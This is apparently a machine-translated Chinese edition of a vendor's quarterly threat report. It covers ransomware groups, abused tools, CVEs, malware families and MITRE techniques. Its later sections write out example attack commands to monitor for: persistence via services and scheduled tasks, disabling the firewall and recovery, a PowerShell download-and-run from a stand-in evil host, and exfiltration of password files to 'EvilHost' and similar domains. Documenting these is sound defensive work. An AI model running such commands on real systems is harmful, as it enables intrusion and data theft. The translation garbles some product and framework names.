BlackSuit 的攻击方法包括钓鱼电子邮件、恶意 torrent 文件以及利用 VPN 和防火墙的漏洞。该组织混合使用 Cobalt Strike、WinRAR、PuTTY、Rclone、Advanced IP Scanner、Mimikatz、PsExec、Rubeus 和 GMER 等合法和恶意工具进行横向移动和凭证转储。它们的勒索软件有效载荷设计用于针对 Windows® 和 Linux® 操作系统,在某些情况下还针对 VMware ESXi 服务器。
美国卫生与公众服务部强调了 BlackSuit 与 Royal 勒索软件之间的相似性,暗示BlackSuit 可能源自 Royal 的创建者、臭名昭著的 Conti 集团。BlackSuit使用的加密机制和命令行参数与Royal中的惊人相似,表明它们共享一个代码库。
这一时期的目标包括
- 在日本媒体集团角川公司,该组织伪装成奇虎 360 杀毒软件的合法组件。
- 其他著名目标包括爱荷华州锡达福尔斯镇、一家美国跨国软件公司、堪萨斯城堪萨斯州警察局以及全球制药公司 Octapharma Plasma, Inc.
-
黑巴斯塔
BlackBasta(又名 Black Basta)是一个勒索软件运营商和勒索软件即服务(RaaS)犯罪企业,于 2022 年初浮出水面。根据CISA 和 FBI 的一份联合报告,BlackBasta 关联公司已将目标锁定为北美、欧洲和澳大利亚的 500 多家私营企业和关键基础设施实体,其中包括医疗保健组织。
BlackBasta 采用典型的初始访问方法,包括网络钓鱼和利用已知漏洞。获得访问权限后,对手会进行侦查以绘制目标网络地图,并使用 Mimikatz 转储凭证。勒索软件操作员使用获取的凭据提升权限并横向移动以入侵网络。在加密之前,BlackBasta 威胁行为者会禁用防御系统、外泄敏感信息并删除阴影卷副本,以便在最后一击之前保持隐蔽。据了解,该组织采用双重勒索策略,对关键数据和重要服务器进行加密,并威胁要在其公共泄密网站上发布敏感信息。
本报告所述期间的目标包括
- 一家著名的美国医疗保健提供商。BlackBasta 对该医疗机构的患者数据及其操作系统进行了加密,从而危及了患者护理和数据隐私。
- Keytronic 是一家美国制造商。BlackBasta 发起的网络攻击破坏了该公司的运营,并限制了对基本业务应用程序的访问。此外,由于勒索软件团伙泄露了被盗数据,该公司还遭受了数据泄露。
这些攻击突出表明,BlackBasta 持续关注各行各业的高价值目标,采用复杂的勒索软件策略最大限度地发挥其破坏和勒索潜力。
-
锁定位
LockBit 是一个据称与俄罗斯有关联的网络犯罪集团,通过其同名恶意软件专门提供 RaaS 服务。该组织的操作人员兢兢业业地维护和改进勒索软件,监督谈判,并在成功入侵后精心策划其部署。LockBit 采用双重勒索策略,不仅加密本地数据以限制受害者的访问,还外泄敏感信息,威胁公开数据,除非支付赎金。
国际网络犯罪工作组 Cronos 行动在 2 月份严重破坏了 LockBit。不过,该组织仍然非常活跃,本季度在针对欧洲、中东和非洲地区组织的攻击中最为积极。目标包括
- 本地化的关键基础设施。在欧洲、中东和非洲地区,LockBit 主要针对大规模中小企业,其中大部分在英国、德国和法国。该集团主要关注与教育、医疗保健和公共部门相关的小型关键基础设施目标。
- 法国戛纳西蒙娜维埃医院。LockBit 攻击导致了严重的运行中断,迫使医院将所有计算机下线,并重新安排了非紧急程序和预约。
- 威奇托是堪萨斯州最大的城市,拥有 40 万人口。这次重大的勒索软件攻击迫使该市的计算机系统下线,造成了广泛的破坏。LockBit 在其网站上公开发布了赎金截止日期,加大了该市行政部门满足其要求的压力。
-
ShinyHunters
ShinyHunters是一个于 2020 年首次出现的威胁组织,以多次跨行业的数据泄露事件而闻名。据报道,他们的攻击包括针对印尼电子商务公司 Tokopedia 以及 GitHub 和澳大利亚必胜客的攻击。ShinyHunters 在论坛上出售窃取的数据,偶尔也会免费泄露一些外泄数据。具有讽刺意味的是,该组织经常通过 GitHub 代码库中的代码发现漏洞。它搜索不安全的云桶,滥用窃取的凭据,并利用网络钓鱼攻击为其入侵提供便利。
本报告所述期间的其他指称目标包括
- Banco Santander S.A.是一家西班牙银行,为拉丁美洲、美国、英国和西班牙的客户提供服务。ShinyHunters 以约 200 万美元的价格出售了此次漏洞中的数据,影响了 3000 万客户和员工。
- 一家跨国娱乐票务销售和分销公司。他们的客户通过公司使用的人工智能数据云Snowflake 上的一个账户被窃取了数据。该账户缺乏多因素身份验证,因此威胁组织得以进入。ShinyHunters 提出以 50 万美元的价格出售这些数据。
-
Akira
Akira 勒索软件于 2023 年 3 月首次被发现,并因其在各行各业的广泛攻击而迅速声名鹊起。该组织的行动特点是发动一系列引人注目的攻击,并在勒索软件领域持续存在。Akira 尤其以使用双重勒索策略而闻名,它不仅加密数据,还威胁说如果不支付赎金,就会泄露窃取的数据。事实证明,这种方法能有效迫使受害者满足其要求。
Akira 最初以 Windows 系统为重点,后来扩展到 Linux 变种。该组织采用常见的初始访问方法,包括网络钓鱼活动和利用已知漏洞。Akira 还利用 Mimikatz 和 LaZagne 等公开工具进行凭证访问,利用 PsExec 进行远程执行,利用 AnyDesk 或 Radmin 进行远程访问。
Akira 以 RaaS 的形式运行,最初用 C++ 开发,加密文件使用 .akira 扩展名。此外,还发现了一个基于 Rust 的变种,它使用 .powerranges 扩展名。Akira 最近的活动主要针对医疗保健、金融服务、制造和技术行业。这些攻击凸显了该组织的适应性和对各行各业的持续威胁。
-
工具
Rclone、Rubeus、GMER、WinSCP 和 Cobalt Strike 等工具对数据管理、渗透测试和系统维护至关重要。它们的灵活性和可访问性也使其成为威胁行为者滥用的有用工具。
-
Rclone
Rclone 是一款命令行程序,用于在本地计算机和远程存储之间同步、复制、移动或镜像数据。Rclone 提供的后端可支持多种开源和专有服务与平台,包括 HTTP、FTP 或 SMB,以及 Google Drive、MEGA、Dropbox 等。这种灵活性使 Rclone 成为合法用户的实用工具,但同时也使其成为威胁行为者的理想选择,因为威胁行为者正在寻找一种将数据渗入其云服务的手段。多年来,许多勒索软件行为者都在使用它,包括本季度活跃的一些勒索软件,如 Akira、BlackBasta 和 LockBit。 -
鲁伯斯
Rubeus 是一个开源工具,改编自 Benjamin Delpy 著名的 Kekeo 项目,用于原始 Kerberos 交互和滥用,包括票据检索和更新、受限委托滥用、票据伪造、管理、外渗、收获和kerberoasting。现在,它经常被恶意行为者用作大型攻击框架的一部分,并与支持跨平台植入和多种通信协议的 Sliver C2 等工具集成。 -
GMER
GMER是一款通过扫描隐藏进程、线程、模块、服务、文件和注册表键值来检测和删除 rootkit 的应用程序。它还能执行内联挂钩,并挂钩到中断描述符表(IDT)、系统服务描述符表(SSDT)和输入/输出请求包(IRP)调用。虽然 GMER 通常是用于检测和删除有害内核驱动程序的良性工具,但它也被用来绕过安全措施。例如,Play 和 BlackSuit 勒索软件组织都曾使用 GMER 来解除安全防御,确保有效载荷不受干扰地执行。 -
WinSCP
Windows Secure Copy (WinSCP) 是一款免费的开源客户端,用于 SFTP、FTP、WebDAV 和 SCP 协议,专为 Microsoft Windows 设计。它利用 SFTP 等加密协议,促进本地和远程计算机之间的安全文件传输,确保数据安全。不过,它的功能也使其成为威胁行为者的首选工具。攻击者可利用 WinSCP 偷偷外泄大量数据,将恶意软件上传到目标服务器以进一步入侵系统,并获得远程访问权限以执行任意命令,或部署其他恶意软件,从而保持对入侵系统的持久控制。 -
钴罢工
Cobalt Strike是一个复杂的对手模拟框架,经过精心设计,可以在网络环境中复制威胁角色的持续存在。Cobalt Strike由两个关键部分组成:一个代理(信标)和一个服务器(团队服务器)。Cobalt Strike团队服务器作为互联网上的长期C2服务器,与部署在受害者机器上的信标有效载荷保持持续通信。
虽然 Cobalt Strike 主要被渗透测试人员和红队人员用作评估网络安全状况的工具,但不幸的是,它也被恶意威胁行为者利用。尽管钴打击的目的是为了安全,但其代码在网上泄露的情况时有发生,导致各种对手迅速将其武器化。这种双重性质凸显了保持警惕和采取强有力的网络安全措施的重要性,以降低滥用的相关风险,保护网络免受潜在的利用。
网络故事亮点:新兴勒索软件集团 - 太空熊
在勒索软件团伙充斥的网络威胁环境中,针对合法组织的勒索软件仍然是网络犯罪分子的有利可图之举。新团伙经常出现或从旧团伙中分化出来,通常以新的或改进的勒索软件菌株和作案手法开始行动,而这些手法通常沿用过去威胁行为者久经考验的方法。
本报告所述期间出现的 Space Bears 就是这样一个团体,他们以其华而不实的泄密网站而闻名。一些研究人员认为,他们可能与 Phobos RaaS 运营商有联系。
谁是太空熊?
与当今大多数勒索软件团伙一样,Space Bears 采用了双重勒索方法。在进入受害者的网络后,它们首先会流出敏感数据,然后对其进行加密,向受害者施压,迫使其支付赎金。太空熊可能会威胁说,如果不支付赎金,他们就会在互联网上公开发布数据。
被盗数据的参考资料发布在他们的泄密网站上,该网站位于深网上的一个".onion "地址。Tor 项目通常被称为 "洋葱路由器",是一种开源隐私保护工具,可确保用户的在线活动匿名且安全。如果受害者不在规定时间内支付赎金,就会在这个泄密网站上被点名羞辱,并显示一个倒计时器,直到数据被释放。自 4 月中旬开始活跃以来,该组织已针对全球各行业的 20 多名受害者实施了攻击。
太空熊的目标行业和地理位置
常见漏洞和风险
著名的常见漏洞和暴露(CVE)为识别、规范和公布已知的安全漏洞和暴露提供了一个框架。从 2024 年 4 月到 6 月,美国国家标准与技术研究院(NIST)报告了近 12011 个新的 CVE。与 2024 年 1 月至 3 月的类似时间段相比,披露的漏洞增加了近 35%。
五月份是今年迄今为止新发现 CVE 最多的月份,新发现的 CVE 接近 5103 个,打破了今年第一季度的所有记录。其中包括
Palo Alto PAN-OS RCE
CVE-2024-3400(10.0 临界) 任意代码执行
据 Palo Alto 称,此问题适用于配置有 GlobalProtect 网关或 GlobalProtect 门户的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙。该 CVE 与 Palo Alto Networks PAN-OS 软件的 GlobalProtect 功能中的任意文件创建漏洞导致的命令注入有关。该漏洞有可能使未经认证的攻击者以根权限在防火墙上执行任意代码。鉴于这种可能性,CVE 被评为最高危急等级。
PyTorch 框架存在 RCE 漏洞
CVE-2024-5480(10.0 严重) 任意代码执行
PyTorch 的 "torch.distributed.rpc "框架(特别是 2.2.2 之前的版本)中存在漏洞,允许远程代码执行 (RCE)。该漏洞允许攻击者利用内置 Python 函数执行任意命令。
量子网关信息披露
CVE-2024-24919(8.6 高) 身份验证绕过
VPN 等外围网络设备是黑客和高级国家赞助者的主要攻击目标。Check Point™ 于 2024 年 5 月 28 日发布了一条零日公告,警告客户其安全网关中的一个漏洞可允许攻击者访问敏感信息并获得域权限。该漏洞可使黑客横向移动并获得更多网络权限。Check Point在一份声明中指出,出现了一些未经授权的访问尝试,有数千台潜在设备受到该漏洞的影响。
按平台划分的普遍威胁:视窗
信息窃取者
Lumma Stealer 是一款基于 C 语言的信息窃取程序,主要从受害者的设备中窃取私人和敏感数据,包括加密货币钱包数据和双因素身份验证(2FA)浏览器扩展数据。
下载器
GuLoader(又名 CloudEyE)是用 Visual Basic 5 或 6 封装的加密 shellcode,用于下载各种类型的附加有效载荷。
信息窃取者
Agent Tesla 是一种基于 .NET 的木马,经常被当作 MaaS 出售,主要用于收集凭证。
信息窃取者
RisePro使用多种传播方式访问受害者的设备并收集敏感数据,然后发送回 C2 服务器。
信息窃取者
RedLine Stealer 使用各种应用程序和服务来收集受害者信息,如密码、cookies 和信用卡信息。
远程访问木马
Remcos 是远程控制和监视的简称,是一种用于远程访问受害者设备的应用程序。
远程访问木马
DCRat是一种远程访问木马,可从 C2 服务器窃取受害者信息并执行命令。据观察,DCRat 是通过 Signal 传播的。
僵尸网络
Amadey 是一个僵尸网络,它收集受害者信息,并等待 C2 服务器的命令来下载额外的有效载荷。
按平台划分的普遍威胁:Linux
特洛伊木马
在本报告所述期间,木马 XorDDos 在我们的遥测中仍然很普遍。XorDDos 使用 XOR 加密技术控制对通信和执行数据的访问,感染基于 Linux 的设备,并通过 C2 指令将其控制为一个单一的僵尸网络。
后门
BPFDoor 是一个 Linux 后门,它利用伯克利数据包过滤器 (BPF) 嗅探器拦截和修改网络流量。由于 BPFDoor 能够绕过防火墙而不被发现,因此被威胁组织 Red Menshen 用作被动监控工具。BPFDoor 的新变种采用了反向外壳通信并加强了加密。
僵尸网络
已检测到 Mirai 利用身份验证绕过漏洞访问端点,并利用命令注入漏洞交付和部署僵尸网络并接管易受攻击的设备。
僵尸网络
Bashlite 又名 Gafgyt,是另一个 Linux 僵尸网络,它使用 C2 服务器发送指令,由受感染的设备执行。据记录,它以路由器等物联网(IoT)设备为目标,并利用这些设备协调针对目标的大规模 DDoS 攻击。
Coinminer
XMRig 因其高性能和开源性,一直是挖掘 Monero 等加密货币的热门工具。一旦获得系统的初始访问权限,威胁者通常会部署该工具,并在受害者不知情的情况下挖掘加密货币。
按平台划分的普遍威胁:MacOS
偷窃者
Cuckoo Stealer 是由 Kandji 的威胁研究团队于今年 4 月发现并命名的,它以恶意磁盘镜像 (DMG) 文件的形式发布,其中包含间谍软件和信息窃取功能。自从发现 Cuckoo Stealer 以来,该恶意软件的新样本在野外急剧增加。
偷窃者
原子窃取程序(又名 AMOS)依然猖獗,野外发现了许多新变种。新变种伪装成各种应用程序,通过磁盘镜像分发。AMOS 是一种针对密码、浏览器 cookie、自动填充数据、加密钱包和 Mac 钥匙串数据的窃取程序。
后门
研究人员发现了一种利用 Python 包索引(PyPI)的恶意攻击。该恶意软件利用 PyPI 库在目标计算机上安装 Sliver C2 有效载荷。该软件包是用 Go 编程语言编写的,并使用便携式网络图形(PNG)文件中的隐写术来实施攻击。
偷窃者
该恶意软件利用弧形网页浏览器的恶意谷歌广告进行传播。这些广告会诱骗受害者下载一个恶意的 DMG 安装文件,该文件会启动感染过程,将恶意软件植入机器。Poseidon 能够获取用户凭据、VPN 配置和加密货币钱包。
按平台划分的普遍威胁:安卓
信息窃取者
该信息窃取程序利用 Android 辅助服务捕获用户数据,并将捕获的数据发送到其 C2 服务器。SpyNote 包括点击/长按,截图和锁定受害者屏幕的功能。
后门/勒索软件
Rafel RAT 以木马程序或网络钓鱼活动的形式发布。其功能包括 C2、位置跟踪、重定向设备通知,以及从目标设备中提取个人短信和通话记录。
信息窃取者
SoumniBot 可窃取银行密钥并掠夺受害者的银行账户。该恶意软件利用安卓系统清单中的验证问题,窃取信息并上传到远程服务器。
信息窃取者
Vultur 通过木马应用程序和 "smishing"(短信钓鱼)社交工程技术传播。除数据外泄外,威胁者还可利用 Vultur 更改文件系统、修改执行权限,并使用 Android 辅助功能服务控制受感染设备。
MITRE 常用技术
了解威胁组织的高级技术有助于决定哪些检测技术应优先使用。在本报告所述期间,BlackBerry 观察到威胁行为者正在使用以下前 20 种技术。
检测到的技术
下表显示了排名前 20 位的技术。变化 "一栏中的向上箭头(↑)表示自上次报告以来 该技术的使用率有所上升 。向下箭头(↓)表示 自上次报告以来使用率有所 下降。等号(=)表示该技术与上次报告中的位置相同。
技术名称 | 技术 ID | 战术名称 | 最新报告 | 改变 |
---|---|---|---|---|
劫持执行流程
|
T1574
|
持久性、特权升级、防御规避
|
NA
|
↑
|
DLL 侧加载
|
T1574.002
|
持久性、特权升级、防御规避
|
3
|
↑
|
工艺注入
|
T1055
|
特权升级、防御规避
|
1
|
↓
|
输入捕捉
|
T1056
|
凭证访问,收集
|
4
|
=
|
发现系统信息
|
T1082
|
发现
|
2
|
↓
|
软件发现
|
T1518
|
发现
|
NA
|
↑
|
发现安全软件
|
T1518.001
|
发现
|
5
|
↓
|
过程探索
|
T1057
|
发现
|
8
|
↓
|
文件和目录发现
|
T1083
|
发现
|
7
|
↓
|
伪装
|
T1036
|
防御回避
|
6
|
↓
|
应用层协议
|
T1071
|
命令与控制
|
9
|
↓
|
非应用层协议
|
T1095
|
命令与控制
|
11
|
↓
|
远程系统发现
|
T1018
|
发现
|
12
|
↓
|
启动或登录自动启动执行
|
T1547
|
持久性、特权升级
|
NA
|
↑
|
注册表运行键/启动文件夹
|
T1547.001
|
持久性、特权升级
|
10
|
↓
|
发现应用窗口
|
T1010
|
发现
|
13
|
↓
|
损害防御
|
T1562
|
防御回避
|
NA
|
↑
|
禁用或修改工具
|
T1562.001
|
防御回避
|
17
|
↓
|
预定任务/工作
|
T1053
|
执行、持久性、权限升级
|
15
|
↓
|
来自本地系统的数据
|
T1005
|
收藏品
|
NA
|
↑
|
技术 ID | |
---|---|
劫持执行流程 |
T1574
|
DLL 侧加载 |
T1574.002
|
工艺注入 |
T1055
|
输入捕捉 |
T1056
|
发现系统信息 |
T1082
|
软件发现 |
T1518
|
发现安全软件 |
T1518.001
|
过程探索 |
T1057
|
文件和目录发现 |
T1083
|
伪装 |
T1036
|
应用层协议 |
T1071
|
非应用层协议 |
T1095
|
远程系统发现 |
T1018
|
启动或登录自动启动执行 |
T1547
|
注册表运行键/启动文件夹 |
T1547.001
|
发现应用窗口 |
T1010
|
损害防御 |
T1562
|
禁用或修改工具 |
T1562.001
|
预定任务/工作 |
T1053
|
来自本地系统的数据 |
T1005
|
战术名称 | |
---|---|
劫持执行流程 |
持久性、特权升级、防御规避
|
DLL 侧加载 |
持久性、特权升级、防御规避
|
工艺注入 |
特权升级、防御规避
|
输入捕捉 |
凭证访问,收集
|
发现系统信息 |
发现
|
软件发现 |
发现
|
发现安全软件 |
发现
|
过程探索 |
发现
|
文件和目录发现 |
发现
|
伪装 |
防御回避
|
应用层协议 |
命令与控制
|
非应用层协议 |
命令与控制
|
远程系统发现 |
发现
|
启动或登录自动启动执行 |
持久性、特权升级
|
注册表运行键/启动文件夹 |
持久性、特权升级
|
发现应用窗口 |
发现
|
损害防御 |
防御回避
|
禁用或修改工具 |
防御回避
|
预定任务/工作 |
执行、持久性、权限升级
|
来自本地系统的数据 |
收藏品
|
最新报告 | |
---|---|
劫持执行流程 |
NA
|
DLL 侧加载 |
3
|
工艺注入 |
1
|
输入捕捉 |
4
|
发现系统信息 |
2
|
软件发现 |
NA
|
发现安全软件 |
5
|
过程探索 |
8
|
文件和目录发现 |
7
|
伪装 |
6
|
应用层协议 |
9
|
非应用层协议 |
11
|
远程系统发现 |
12
|
启动或登录自动启动执行 |
NA
|
注册表运行键/启动文件夹 |
10
|
发现应用窗口 |
13
|
损害防御 |
NA
|
禁用或修改工具 |
17
|
预定任务/工作 |
15
|
来自本地系统的数据 |
NA
|
改变 | |
---|---|
劫持执行流程 |
↑
|
DLL 侧加载 |
↑
|
工艺注入 |
↓
|
输入捕捉 |
=
|
发现系统信息 |
↓
|
软件发现 |
↑
|
发现安全软件 |
↓
|
过程探索 |
↓
|
文件和目录发现 |
↓
|
伪装 |
↓
|
应用层协议 |
↓
|
非应用层协议 |
↓
|
远程系统发现 |
↓
|
启动或登录自动启动执行 |
↑
|
注册表运行键/启动文件夹 |
↓
|
发现应用窗口 |
↓
|
损害防御 |
↑
|
禁用或修改工具 |
↓
|
预定任务/工作 |
↓
|
来自本地系统的数据 |
↑
|
BlackBerry 威胁研究和情报团队使用MITRED3FEND™ 为本报告期内观察到的技术制定了一份完整的应对措施清单,该清单可在我们的公共 GitHub 上查阅。威胁者使用前三种最著名的技术来收集关键信息,从而成功实施攻击。在 "应用对策 "部分,我们将讨论这些技术的使用示例以及需要监控的有用信息。从图中可以看出所有技术和战术的影响等级。
-
应用对策
BlackBerry 研究和情报小组分析了五项最值得观察的 MITRE 技术:
-
劫持执行流程 - T1574
劫持执行流(T1574) 是一种复杂的技术,敌方利用它来拦截和操纵系统的正常执行流,从而执行恶意代码。这种方法在上一季度非常普遍,显示出其在实现持久性和执行未授权操作方面的有效性。
利用这种技术的方法有多种途径,包括劫持 DLL 搜索顺序、DLL 侧载和向合法进程注入恶意代码。通过劫持执行流,攻击者可以在不触发标准安全警报的情况下获得对系统的控制权。这使得安全工具在检测和防止威胁行为者的未来活动方面面临挑战。例如,通过将恶意 DLL 放在比合法 DLL 更早搜索到的位置,攻击者可以确保在合法应用程序加载 DLL 时执行其代码。
对于对手来说,这种技术的一个重要优势是能够绕过安全措施。由于恶意代码是在受信任进程的上下文中执行的,因此可以避开依赖进程行为分析的传统安全机制。这种能力使 "劫持执行流 "变得尤为危险,因为它可用于执行从权限升级到数据外泄等各种恶意活动。
为防御 T1574,企业应实施全面的安全措施,包括应用程序白名单、严格的补丁管理以及对系统和网络活动的持续监控。定期更新软件并确保只有经授权的应用程序才能运行,可大大降低执行流劫持的风险。
用户意识培训在帮助员工识别潜在的执行流劫持企图的迹象方面也发挥着重要作用,有助于建立健全的安全态势。最后,采用能够识别与该技术相关的异常行为模式的高级威胁检测解决方案对于及时检测和响应至关重要。使用 T1574 的一些示例包括
- DLL 搜索顺序劫持:一个常见的例子是利用 Windows 中的 DLL 搜索顺序。如果攻击者在应用程序的工作目录中放置恶意 msvcrt.dll,应用程序就会加载它,而不是从系统目录中加载合法版本。
- DLL 侧加载:2018 年,APT 组织OceanLotus利用 DLL 侧加载合法的 Microsoft Word 可执行文件来加载恶意 DLL,从而建立持久性并执行进一步的有效载荷。
- COM 劫持:攻击者在合法应用程序经常查询的特定注册表键值下注册恶意 COM 对象。当应用程序调用 COM 对象时,执行的是恶意代码而不是预定的 COM 对象。
- Windows AppInit_DLLs:通过修改 AppInit_DLLs 等注册表键值,攻击者可确保其恶意 DLL 载入所有适用进程,从而控制这些进程。
- 注入合法进程:这种技术的一个已知案例是 Cobalt Strike 工具使用反射式 DLL 注入,将有效载荷注入合法进程,以逃避安全软件的检测。
-
启动或登录自动启动执行 - T1547
在启动或登录自动启动执行(T1547)技术中,攻击者首先要确保恶意软件在系统启动或用户登录时自动运行。然后,攻击者利用注册表键、启动文件夹、计划任务或服务注册等机制来保持持久性或获得被入侵系统的高级权限。这些机制旨在促进操作系统上的合法软件功能和系统管理任务。然而,对手可以滥用这些功能来嵌入恶意代码,从而帮助其混入正常的系统操作中。了解这些关键操作系统机制并确保其安全,对于防止未经授权的持续运行和权限升级至关重要。
下面是一个经常用于建立持久性的注册表键值位置示例:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run' - 这是 Windows 注册表,用于配置程序在操作系统启动时自动运行。
用于建立持久性的启动文件夹示例如下:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup" - 该路径指向启动文件夹,用户登录时应自动启动的程序的快捷方式都放在这里。
下面举例说明如何利用服务创建来实现持久性:
'sc create Updater binPath= "C:\Windows\malicious[.]exe" start= auto' - 该命令利用服务实用程序创建名为 "Updater "的服务,并配置为在系统启动时自动启动。
另一个建立持久性并获得提升权限的例子是通过 Windows 任务计划程序:
'schtasks /create /tn "Updater" /tr "C:\Windows\malicious[.]exe" /sc onlogon /ru SYSTEM' - 该命令会创建一个名为 "Updater "的计划任务,每次用户登录时都会在指定位置运行可执行恶意程序。
-
损害防御 - T1562
MITRE 的 "防御规避"(TA0005)战术下的 "损害防御"(T1562)技术被认为是本报告期内对手最常使用的五大技术之一。这种技术改变受害者的环境要素,以阻碍或禁用防御机制。对手不仅会破坏防火墙和防病毒 (AV) 软件等预防性防御措施,还会破坏防御者用于审计活动和识别恶意行为的检测能力。
当威胁行为者成功破坏了受害者的防御系统后,他们就可以在不被发现的情况下进行攻击。这使他们能够注入恶意二进制文件,从而利用 MITRE 的其他技术,如键盘记录程序、蠕虫、木马和恶意 Web 外壳。这些都会导致勒索软件在机器上被执行。
采取针对 MITRE 技术 T1562 的保护措施以保护系统免受此类攻击至关重要。这种技术通常在攻击开始时使用,因此必须尽早发现并加以应对。
下面列出了对监控有用的命令行:
- sc stop <ServiceName>
- sc config <ServiceName> start=disabled
- net stop <ServiceName>
- taskkill /IM <ToolName> /F
- netsh advfirewall set allprofiles state off
- bcdedit.exe /deletevalue {default} 安全启动
- bcdedit /set {default} recoveryenabled no
-
发现应用窗口 - T1010
BlackBerry 专家认为,在本报告所述期间,发现策略(TA0007)下的应用程序窗口发现技术(T1010)是网络威胁行为者使用的最多的技术之一。该技术包括列出打开的 Windows 应用程序,为威胁行为者提供有关目标系统使用模式的有用信息。这些信息对于确定值得收集的特定数据以及攻击者为避免被发现而必须躲避的安全软件非常有价值。威胁行为者利用这种技术可以更好地了解环境,并计划攻击,尽可能在不被发现的情况下进行攻击。
要首先获取打开的 Windows 应用程序列表,攻击者通常会利用系统内置功能。例如,他们可能会利用命令和脚本解释器中的命令或本地 API 中的函数来收集必要的信息。之所以经常使用这些本地工具和函数,是因为它们不容易引起怀疑,而且可以提供有关系统的全面信息。
鉴于这些行为都很可疑,并能为敌方提供有关受害者系统的重要信息,因此,安全软件配置必须能够检测到敌方执行的这些命令或操作。
下面列出了可能有助于监控的命令行:
- gps | where {$_.mainwindowtitle}
- Get-Process | Where-Object MainWindowTitle
- "cscript.exe"、"rundll32.exe"、"explorer.exe"、"wscript.exe"、"PowerShell.exe"、"pwsh.dll"、"winlogon.exe"、"cmd.exe "是使用这些 API 的父进程:"user32.dll!GetWindowTextA"、"user32.dll!GetForegroundWindow"、"user32.dll!GetActiveWindow"、"user32.dll!GetWindowTextW"
- 任务列表和任务列表 /v
-
软件探索 - T1518
MITRE ATT&CK 框架将软件发现 (T1518) 确定为发现战术 (TA0007) 下的一项关键技术。这种方法经常被对手用来深入了解目标系统的软件环境,因此成为许多网络攻击的关键步骤。软件发现可让攻击者通过确定系统上安装了哪些应用程序和版本来识别漏洞。这些信息可帮助攻击者利用过时或未打补丁的软件,计划如何禁用或规避安全措施,并定制攻击以取得最大效果。
发现软件的常用方法包括使用 Windows Management Instrumentation (WMI) 命令(如 wmic "product" get name, version, vendor)和 PowerShell 脚本(如 Get-ItemProperty 或 Get-WmiObject)。通过这些方法,攻击者可以检索详细的软件信息,查询 Windows 注册表,并识别运行中的进程和相关应用程序。成功发现软件会产生重大影响。攻击者可以利用识别出的软件漏洞提升权限或执行任意代码。他们还可以禁用或规避安全防御措施,增加不被发现的可能性。此外,通过了解软件环境,攻击者可以部署专门针对已发现应用程序的恶意软件,从而提高攻击的有效性和隐蔽性。
为防范这种技术,企业应实施强大的监控和警报机制。监控通常与软件发现相关的命令和脚本的使用至关重要。采用使用行为分析的高级威胁检测系统有助于检测异常活动。确保所有软件都是最新的并打有补丁,仅限授权人员使用管理工具,以及维护全面的命令执行日志也是至关重要的步骤。
CylanceMDR 数据
报告的这一部分重点介绍了在本报告所述期间,在客户环境中观察到的最有趣的威胁检测。 CylanceMDR客户环境中发现的最有趣的威胁检测。
CylanceMDR 是一项基于订购的托管检测和响应 (MDR) 服务,提供全天候监控。它可以帮助企业阻止在客户安全计划中寻找漏洞的复杂网络威胁。BlackBerry MDR 团队在本报告期内跟踪了数千个警报。下面,我们将按地区对遥测数据进行细分,以提供对当前威胁状况的更多洞察。
CylanceMDR 意见
在本报告所述期间,与上一份报告类似,CylanceMDR 小组注意到 Certutil 仍是所有地区安全操作中心 (SOC) 的一个大检测源。
在北美/拉丁美洲 (NALA) 和欧洲、中东和非洲地区,我们还注意到与 "PowerShell 下载 "检测相关的活动趋势。例如,我们看到对手试图通过 PowerShell(如 powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1'))使用下载平台来实现 MITRE 技术的入侵工具传输(T1105)。
此外,我们还发现 Base64 编码的检测次数有所增加,这在我们上一份报告的调查结果中并不常见。Base64 编码为威胁行为者提供了一种相对简单的方法来混淆代码、伪装恶意代码并降低其被检测的可能性。不过,大多数经验丰富的分析师都非常了解威胁行为者对 Base64 的使用,因此,较成熟的 SOC 通常会加入额外的警惕和检测功能,以识别这种规避技术。
在本报告所述期间,我们开始在 NALA 和亚太地区发现更多与 "可能通过 DLL 加载滥用 Msiexec "有关的检测,这一点尤其值得关注。Msiexec 是 Windows 中的一种命令行实用程序,通常与执行 .msi 安装包有关。我们的系统检测到威胁行为者试图滥用 Msiexec 代理执行恶意 DLL 有效负载(MITRE 技术 T1218.007)。看到的命令示例是:'C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll'。
LOLBAS 活动
在本报告所述期间,我们观察到以下离岸二进制文件、脚本和库(LOLBAS)活动:
- Bitsadmin 仍然是观测到的最高 LOLBAS。
- Certutil 紧随其后,而且自上一报告期以来有所增加。
- 仍能观察到 Regsvr32、MSHTA 和 MOFCOMP,但总体比例较低。
渗透工具
在上一份报告中,我们讨论了远程监控和管理 (RMM) 工具以及它们如何经常被威胁行为者滥用。RMM 工具为攻击者提供了一种保持持久性和易于访问的简便方法,同时也提供了一种从客户环境中轻松渗出数据的方法。事实上,据研究人员报告,RMM 工具是勒索软件集团从受害者环境中流出数据的增长最快的类别。
在本报告所述期间,CylanceMDR 审查了客户环境中最常见的可用于外泄的工具(不包括 RMM 工具)。
工具
WinSCP
说明 WinSCP 是一款文件传输客户端;PuTTY 是一款安全外壳(SSH)客户端。
命令行示例:winscp.exe scp://test:P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto
注: 通常与图形用户界面(GUI)一起使用
斜切工具 ID:T1048
Rclone
简介Rclone 是一款命令行工具,用于管理云存储上的内容(即允许在云中传输文件)。
命令行示例:rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10
斜切工具 ID:S1040
FileZilla
简介FileZilla 是一款著名的文件传输协议 (FTP) 工具,可用于各种操作系统。
命令行示例:filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"
斜切铆钉和铆钉 ID:T1071.002T1071.002
PSCP
描述PuTTY Secure Copy Protocol(PSCP)是一款用于传输文件和文件夹的命令行工具。
命令行示例:pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp
斜切接头 ID:T1021.004T1021.004
FreeFileSync
说明FreeFileSync 是一款同步工具,可用于管理备份。
命令行示例:FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
斜切工具 ID:T1567.002T1567.002
主要收获
